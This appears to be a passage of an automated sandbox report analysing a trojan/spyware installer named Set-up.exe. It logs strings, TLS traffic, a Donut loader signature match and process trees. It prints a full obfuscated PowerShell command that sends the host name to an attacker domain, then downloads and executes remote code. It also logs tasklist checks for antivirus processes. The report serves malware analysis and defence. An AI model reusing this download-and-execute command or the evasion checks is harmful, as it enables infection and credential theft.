              Source: Set-up.exe, 00000000.00000002.1975541665.00000000005F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txt
              Source: Set-up.exe, 00000000.00000002.1975541665.00000000005CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txt8
              Source: Set-up.exe, 00000000.00000002.1975541665.00000000005F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txts;
              Source: PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
              Source: PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.1996237437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drString found in binary or memory: https://sectigo.com/CPS0D
              Source: Set-up.exe, 00000000.00000003.1967591399.00000000034E6000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1975541665.000000000060F000.00000004.00000020.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.exe.0.drString found in binary or memory: https://ssl.trustwave.com/CA03
              Source: Set-up.exe, 00000000.00000003.1806234531.000000000351E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: Set-up.exe, 00000000.00000003.1833846923.00000000035E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: Set-up.exe, 00000000.00000003.1833846923.00000000035E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: Set-up.exe, 00000000.00000003.1820986433.0000000003515000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1806234531.000000000351C000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1820857270.0000000003515000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1806355173.0000000003515000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1820779277.0000000003515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: Set-up.exe, 00000000.00000003.1806355173.00000000034F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: Set-up.exe, 00000000.00000003.1820986433.0000000003515000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1806234531.000000000351C000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1820857270.0000000003515000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1806355173.0000000003515000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1820779277.0000000003515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: Set-up.exe, 00000000.00000003.1806355173.00000000034F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.1996237437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000003.2003746218.0000000002800000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000003.2528654757.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drString found in binary or memory: https://www.certum.pl/CPS0
              Source: Set-up.exe, 00000000.00000003.1805825614.00000000034EF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1805923865.00000000034D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: Set-up.exe, 00000000.00000003.1805825614.00000000034EF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1805923865.00000000034D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: PU6S498VOPMOZVY2Y7.exe, 00000006.00000003.1987192469.000000007EF0B000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.exe, 00000006.00000003.1978639470.000000000366F000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000000.1992282981.0000000000EA1000.00000020.00000001.01000000.00000009.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000000.2014920504.0000000000ADD000.00000020.00000001.01000000.0000000C.sdmp, PU6S498VOPMOZVY2Y7.tmp.6.drString found in binary or memory: https://www.innosetup.com/
              Source: Set-up.exe, 00000000.00000003.1833846923.00000000035E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: Set-up.exe, 00000000.00000003.1833846923.00000000035E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: Set-up.exe, 00000000.00000003.1833846923.00000000035E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: Set-up.exe, 00000000.00000003.1833846923.00000000035E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: Set-up.exe, 00000000.00000003.1833846923.00000000035E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: PU6S498VOPMOZVY2Y7.exe, 00000006.00000003.1987192469.000000007EF0B000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.exe, 00000006.00000003.1978639470.000000000366F000.00000004.00001000.00020000.00000000.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000007.00000000.1992282981.0000000000EA1000.00000020.00000001.01000000.00000009.sdmp, PU6S498VOPMOZVY2Y7.tmp, 00000009.00000000.2014920504.0000000000ADD000.00000020.00000001.01000000.0000000C.sdmp, PU6S498VOPMOZVY2Y7.tmp.6.drString found in binary or memory: https://www.remobjects.com/ps
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownHTTPS traffic detected: 104.21.87.8:443 -> 192.168.2.4:49748 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.87.8:443 -> 192.168.2.4:49749 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.87.8:443 -> 192.168.2.4:49750 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.87.8:443 -> 192.168.2.4:49751 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.87.8:443 -> 192.168.2.4:49752 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.87.8:443 -> 192.168.2.4:49753 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.87.8:443 -> 192.168.2.4:49755 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.87.8:443 -> 192.168.2.4:49756 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49757 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.208.58:443 -> 192.168.2.4:49758 version: TLS 1.2

              System Summary

              Source: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeWindow found: window name: AutoHotkey
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0226575B NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,CreateThread,0_2_0226575B
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe 16E037D7B5F6A8E02B73671E1214B7979EB5D0AB0FC1106CF4C321F0FF53E13A
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\is-16TGC.tmp\_isetup\_isdecmp.dll 31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
              Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 022272D8 appears 130 times
              Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 02219A48 appears 73 times
              Source: Set-up.exeStatic PE information: invalid certificate
              Source: Set-up.exeStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
              Source: Set-up.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
              Source: PU6S498VOPMOZVY2Y7.tmp.6.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
              Source: PU6S498VOPMOZVY2Y7.tmp.8.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
              Source: PU6S498VOPMOZVY2Y7.tmp.8.drStatic PE information: Number of sections : 11 > 10
              Source: PU6S498VOPMOZVY2Y7.exe.0.drStatic PE information: Number of sections : 11 > 10
              Source: PU6S498VOPMOZVY2Y7.tmp.6.drStatic PE information: Number of sections : 11 > 10
              Source: Set-up.exe, 00000000.00000003.1780846179.0000000002B9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs Set-up.exe
              Source: Set-up.exe, 00000000.00000000.1684675006.0000000000520000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.1914060510.000000000397B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exeBinary or memory string: OriginalFilenameshfolder.dll~/ vs Set-up.exe
              Source: Set-up.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@59/13@3/3
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_02210AAB CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,0_2_02210AAB
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpFile created: C:\Users\user\AppData\Roaming\ColorStreamLibJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2084:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6952:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2828:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5376:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6472:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5424:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2476:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2360:120:WilError_03
              Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exeJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'WRSA.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'OPSSVC.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVASTUI.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSWSCSVC.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SOPHOSHEALTH.EXE'
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
              Source: Set-up.exe, 00000000.00000003.1820887982.00000000034C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: Set-up.exeReversingLabs: Detection: 18%
              Source: Set-up.exeVirustotal: Detection: 17%
              Source: Set-up.exeString found in binary or memory: -Helper process exited with failure code: 0x%x
              Source: Set-up.exeString found in binary or memory: -HelperRegisterTypeLibrary: StatusCode invalidU
              Source: Set-up.exeString found in binary or memory: /LoadInf=
              Source: Set-up.exeString found in binary or memory: /InstallOnThisVersion: Invalid MinVersion string
              Source: C:\Users\user\Desktop\Set-up.exeFile read: C:\Users\user\Desktop\Set-up.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\Set-up.exe "C:\Users\user\Desktop\Set-up.exe"
              Source: C:\Users\user\Desktop\Set-up.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; (a
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\Set-up.exe, Process created: C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe "C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe"
              Source: C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe, Process created: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmp "C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmp" /SL5="$2042C,7785838,845824,C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmp, Process created: C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe "C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe" /VERYSILENT
              Source: C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe, Process created: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmp "C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmp" /SL5="$60272,7785838,845824,C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe" /VERYSILENT
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmp, Process created: C:\Windows\System32\timeout.exe "timeout" 9
              Source: C:\Windows\System32\timeout.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmp, Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
              Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmp, Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
              Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmp, Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
              Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\find.exe find /I "avastui.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmp, Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
              Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmp, Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
              Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmp, Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
              Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmp, Process created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: msimg32.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
